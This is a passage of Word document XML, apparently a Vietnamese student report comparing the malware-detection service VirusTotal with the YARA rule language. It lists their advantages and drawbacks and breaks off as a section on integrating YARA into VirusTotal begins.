          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">VirusTotal và Yara là hai công cụ bảo mật khác nhau được sử dụng để phát hiện và phân tích mã độc. VirusTotal là một dịch vụ trực tuyến cung cấp khả năng quét các tệp và URL thông </w:t>
      </w:r>
      <w:r w:rsidRPr="00154862">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>qua một loạt các công cụ chống vi-rút và công cụ phân tích mã độc. Yara là một ngôn ngữ mô hình hóa tập hợp quy tắc được sử dụng để phát hiện các mẫu trong mã.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6144B285" w14:textId="67336680" w:rsidR="00154862" w:rsidRPr="00154862" w:rsidRDefault="006B08DF" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc150717787"/>
      <w:bookmarkStart w:id="67" w:name="_Toc150718049"/>
      <w:bookmarkStart w:id="68" w:name="_Toc150718136"/>
      <w:r w:rsidRPr="00F35779">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00154862" w:rsidRPr="00154862">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:r w:rsidR="00FA05A9" w:rsidRPr="00F35779">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
      <w:bookmarkEnd w:id="67"/>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="2381833E" w14:textId="7FD5323F" w:rsidR="00154862" w:rsidRPr="00154862" w:rsidRDefault="00154862" w:rsidP="00B24CA2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00154862">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>VirusTotal cung cấp một số</w:t>
      </w:r>
      <w:r w:rsidR="004C549D" w:rsidRPr="00F35779">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ưu điểm</w:t>
      </w:r>
      <w:r w:rsidRPr="00154862">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>, bao gồm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A949CB8" w14:textId="16822D0B" w:rsidR="00154862" w:rsidRPr="00154862" w:rsidRDefault="00F35779" w:rsidP="00B24CA2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00154862" w:rsidRPr="00154862">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Tính khả dụng: VirusTotal là một dịch vụ trực tuyến có thể được truy cập từ bất kỳ đâu. Yara là một công cụ phần mềm phải được cài đặt trên máy tính của bạn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724D0559" w14:textId="6F12CE6C" w:rsidR="00154862" w:rsidRPr="00154862" w:rsidRDefault="00F35779" w:rsidP="00B24CA2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00154862" w:rsidRPr="00154862">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Dữ liệu: VirusTotal có một cơ sở dữ liệu khổng lồ gồm các tệp và URL đã được quét bởi nhiều công cụ chống vi-rút và công cụ phân tích mã độc khác nhau. Điều này giúp VirusTotal có độ chính xác cao hơn trong việc phát hiện mã độc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD3249E" w14:textId="12469A20" w:rsidR="00154862" w:rsidRPr="00154862" w:rsidRDefault="00F35779" w:rsidP="00B24CA2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00154862" w:rsidRPr="00154862">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Sự đơn giản: VirusTotal rất dễ sử dụng. Chỉ cần tải tệp hoặc URL lên trang web VirusTotal và nó sẽ bắt đầu quét. Yara đòi hỏi nhiều kiến thức về ngôn ngữ Yara để sử dụng hiệu quả.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3230697C" w14:textId="77777777" w:rsidR="00154862" w:rsidRPr="00154862" w:rsidRDefault="00154862" w:rsidP="00B24CA2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00154862">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Tuy nhiên, VirusTotal cũng có một số nhược điểm, bao gồm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064B9AB5" w14:textId="18C33DB1" w:rsidR="00154862" w:rsidRPr="00154862" w:rsidRDefault="00195CA8" w:rsidP="00B24CA2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00154862" w:rsidRPr="00154862">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Chi phí: Dịch vụ VirusTotal miễn phí cho các quét cơ bản, nhưng các quét nâng cao có thể tốn phí.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7AD15F" w14:textId="669856E8" w:rsidR="00154862" w:rsidRPr="00154862" w:rsidRDefault="00195CA8" w:rsidP="00B24CA2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00154862" w:rsidRPr="00154862">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Tốc độ: Quét VirusTotal có thể mất một khoảng thời gian, đặc biệt là đối với các tệp lớn hoặc các URL có nhiều nội dung.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBEE528" w14:textId="6A6B0841" w:rsidR="00154862" w:rsidRPr="00154862" w:rsidRDefault="006C3CFB" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc150717788"/>
      <w:bookmarkStart w:id="70" w:name="_Toc150718050"/>
      <w:bookmarkStart w:id="71" w:name="_Toc150718137"/>
      <w:r w:rsidRPr="00F35779">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2. YARA.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
      <w:bookmarkEnd w:id="70"/>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="3569F97D" w14:textId="77777777" w:rsidR="00154862" w:rsidRPr="00154862" w:rsidRDefault="00154862" w:rsidP="00B24CA2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00154862">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Yara cung cấp một số lợi ích so với VirusTotal, bao gồm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D94EE9A" w14:textId="3F103EB9" w:rsidR="00154862" w:rsidRPr="00154862" w:rsidRDefault="00195CA8" w:rsidP="00B24CA2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00154862" w:rsidRPr="00154862">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Tính linh hoạt: Yara có thể được sử dụng để phát hiện các mẫu mã độc cụ thể mà không cần phải quét toàn bộ tệp hoặc URL. Điều này làm cho Yara hữu ích cho việc phát hiện các mối đe dọa mới hoặc các mối đe dọa đã được sửa đổi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15925AA5" w14:textId="41A638B9" w:rsidR="00154862" w:rsidRPr="00154862" w:rsidRDefault="00195CA8" w:rsidP="00B24CA2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00154862" w:rsidRPr="00154862">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Tính khả thi: Yara có thể được tích hợp vào các sản phẩm và dịch vụ bảo mật khác nhau. Điều này giúp Yara dễ dàng triển khai và quản lý.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAC3779" w14:textId="77777777" w:rsidR="00154862" w:rsidRPr="00154862" w:rsidRDefault="00154862" w:rsidP="00B24CA2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00154862">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Tuy nhiên, Yara cũng có một số nhược điểm, bao gồm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD8D408" w14:textId="07DA0FA8" w:rsidR="00154862" w:rsidRPr="00154862" w:rsidRDefault="00195CA8" w:rsidP="00B24CA2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00154862" w:rsidRPr="00154862">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Kiến thức: Yara đòi hỏi kiến thức về ngôn ngữ Yara để sử dụng hiệu quả.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384AFDCA" w14:textId="720C15A2" w:rsidR="00154862" w:rsidRPr="00154862" w:rsidRDefault="00195CA8" w:rsidP="00B24CA2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00154862" w:rsidRPr="00154862">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Sự chính xác: Yara có thể không chính xác như VirusTotal, vì nó chỉ dựa trên các mẫu mã độc đã biết.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320C0F81" w14:textId="27FF4EE3" w:rsidR="00154862" w:rsidRPr="00154862" w:rsidRDefault="00154862" w:rsidP="00B24CA2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00154862">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Nếu cần một giải pháp bảo mật đơn giản và dễ sử dụng có thể phát hiện một loạt các mối đe dọa, thì VirusTotal là một lựa chọn tốt. Nếu cần một giải pháp bảo mật linh hoạt và có thể phát hiện các mối đe dọa mới hoặc đã được sửa đổi, thì Yara là một lựa chọn tốt hơn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BB8409" w14:textId="77777777" w:rsidR="00154862" w:rsidRPr="00154862" w:rsidRDefault="00154862" w:rsidP="00B24CA2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00154862">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Dưới đây là một số trường hợp sử dụng cụ thể cho VirusTotal và Yara:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28268D4D" w14:textId="348DF99D" w:rsidR="00154862" w:rsidRPr="00234B30" w:rsidRDefault="00234B30" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc150717789"/>
      <w:bookmarkStart w:id="73" w:name="_Toc150718051"/>
      <w:bookmarkStart w:id="74" w:name="_Toc150718138"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3. Tích hợp công cụ YARA vào VirusTotal.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
      <w:bookmarkEnd w:id="73"/>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="63D6A603" w14:textId="24049C47" w:rsidR="00C41018" w:rsidRDefault="00245C95" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Chuẩn bị 2 mẫu mã độc</w:t>
      </w:r>
    </w:p>
